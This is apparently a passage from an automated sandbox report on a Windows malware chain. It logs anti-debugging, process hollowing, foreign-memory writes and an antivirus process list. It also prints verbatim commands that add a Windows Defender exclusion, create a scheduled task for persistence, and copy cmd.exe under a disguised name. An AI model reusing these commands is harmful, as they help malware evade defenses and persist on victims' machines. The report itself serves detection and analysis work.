                      Source: Wisrysxl.PIF, 00000016.00000002.2339517329.0000000000611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                      Source: x.exe, 00000000.00000002.2184605014.0000000000866000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2184605014.000000000081E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Wisrysxl.PIF, 0000001B.00000002.2429455325.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                      Source: neworigin.exe, 00000009.00000002.2350888427.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\x.exeAPI call chain: ExitProcess graph end nodegraph_0-32520
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02EDF744
                      Source: C:\Users\user\Desktop\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_1_10041361
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02ED894C
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_004BF794 mov eax, dword ptr fs:[00000030h]8_1_004BF794
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10001130 mov eax, dword ptr fs:[00000030h]8_1_10001130
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10043F3D mov eax, dword ptr fs:[00000030h]8_1_10043F3D
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 24_1_004BF794 mov eax, dword ptr fs:[00000030h]24_1_004BF794
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_004015D7 SetUnhandledExceptionFilter,8_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_004015D7 SetUnhandledExceptionFilter,8_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_1_10041361
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_1_10044C7B
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 24_1_004015D7 SetUnhandledExceptionFilter,24_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 24_1_004015D7 SetUnhandledExceptionFilter,24_1_004015D7
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\x.exeMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\x.exeSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Windows\System32\conhost.exe base address: 400000
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\x.exeMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 361008Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 31C008
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3C1008
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10028550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,8_1_10028550
                      Source: C:\Users\user\Desktop\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02EC5ACC
                      Source: C:\Users\user\Desktop\x.exeCode function: GetLocaleInfoA,0_2_02ECA7C4
                      Source: C:\Users\user\Desktop\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02EC5BD8
                      Source: C:\Users\user\Desktop\x.exeCode function: GetLocaleInfoA,0_2_02ECA810
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,27_2_02D75ACC
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,27_2_02D75BD7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetLocaleInfoA,27_2_02D7A810
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC920C GetLocalTime,0_2_02EC920C
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10028550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,8_1_10028550
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ECB78C GetVersionExA,0_2_02ECB78C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
